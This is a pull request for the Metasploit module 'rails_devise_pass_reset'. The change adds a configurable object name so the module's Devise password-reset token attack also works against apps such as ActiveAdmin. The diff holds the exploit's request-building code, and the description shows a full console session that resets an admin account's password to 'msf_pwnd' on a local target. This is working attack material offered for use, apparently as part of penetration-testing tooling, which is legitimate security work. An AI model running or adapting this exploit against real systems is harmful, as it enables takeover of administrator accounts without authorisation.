### PR TITLE
Adds the ability to configure object name in URI and XML.

### DIFF
--- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb
+++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb
@@ -145,9 +145,10 @@ class Metasploit3 < Msf::Auxiliary
 
   def run
     # Clear outstanding reset tokens, helps ensure we hit the intended account.
-    print_status("Clearing existing tokens...")
-    clear_tokens() if datastore['FLUSHTOKENS']
-
+    if datastore['FLUSHTOKENS']
+      print_status("Clearing existing tokens...")
+      clear_tokens()
+    end
     # Generate a token for our account
     print_status("Generating reset token for #{datastore['TARGETEMAIL']}...")
     status = generate_token(datastore['TARGETEMAIL'])

--- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb
+++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb
@@ -52,6 +52,7 @@ class Metasploit3 < Msf::Auxiliary
       [
         OptString.new('TARGETURI', [ true,  'The request URI', '/users/password']),
         OptString.new('TARGETEMAIL', [true, 'The email address of target account']),
+        OptString.new('OBJECTNAME', [true, 'The user object name', 'user']),
         OptString.new('PASSWORD', [true, 'The password to set']),
         OptBool.new('FLUSHTOKENS', [ true, 'Flush existing reset tokens before trying', true]),
         OptInt.new('MAXINT', [true, 'Max integer to try (tokens begining with a higher int will fail)', 10])
@@ -61,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
   def generate_token(account)
     # CSRF token from GET "/users/password/new" isn't actually validated it seems.
 
-    postdata="user[email]=#{account}"
+    postdata="#{datastore['OBJECTNAME']}[email]=#{account}"
 
     res = send_request_cgi({
       'uri'     => normalize_uri(datastore['TARGETURI']),
@@ -100,11 +101,11 @@ class Metasploit3 < Msf::Auxiliary
       encode_pass = REXML::Text.new(password).to_s
 
       xml = ""
-      xml << "<user>"
+      xml << "<#{datastore['OBJECTNAME']}>"
       xml << "<password>#{encode_pass}</password>"
       xml << "<password_confirmation>#{encode_pass}</password_confirmation>"
       xml << "<reset_password_token type=\"integer\">#{int_to_try}</reset_password_token>"
-      xml << "</user>"
+      xml << "</#{datastore['OBJECTNAME']}>"
 
       res = send_request_cgi({
           'uri'     => normalize_uri(datastore['TARGETURI']),


### PR DESCRIPTION
This allows exploiting other platforms that include devise.

For example, activeadmin is exploitable if running a vulnerable devise and rails version with the following settings;
msf > use auxiliary/admin/http/rails_devise_pass_reset
msf auxiliary(rails_devise_pass_reset) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf auxiliary(rails_devise_pass_reset) > set RPORT 3000
RPORT => 3000
msf auxiliary(rails_devise_pass_reset) > set TARGETEMAIL admin@example.com
TARGETEMAIL => admin@example.com
msf auxiliary(rails_devise_pass_reset) > set TARGETURI /admin/password
TARGETURI => /admin/password
msf auxiliary(rails_devise_pass_reset) > set PASSWORD msf_pwnd
PASSWORD => msf_pwnd
msf auxiliary(rails_devise_pass_reset) > set OBJECTNAME admin_user
OBJECTNAME => admin_user
msf auxiliary(rails_devise_pass_reset) > exploit

[_] Clearing existing tokens...
[_] Generating reset token for admin@example.com...
[+] Reset token generated successfully
[_] Resetting password to "msf_pwnd"...
[+] Password reset worked successfully
[_] Auxiliary module execution completed
msf auxiliary(rails_devise_pass_reset) >

Standing up a vulnerable activeadmin instance is a bit tricky.  Be sure to use a vulnerable version of devise and rails (per this module's Description).  
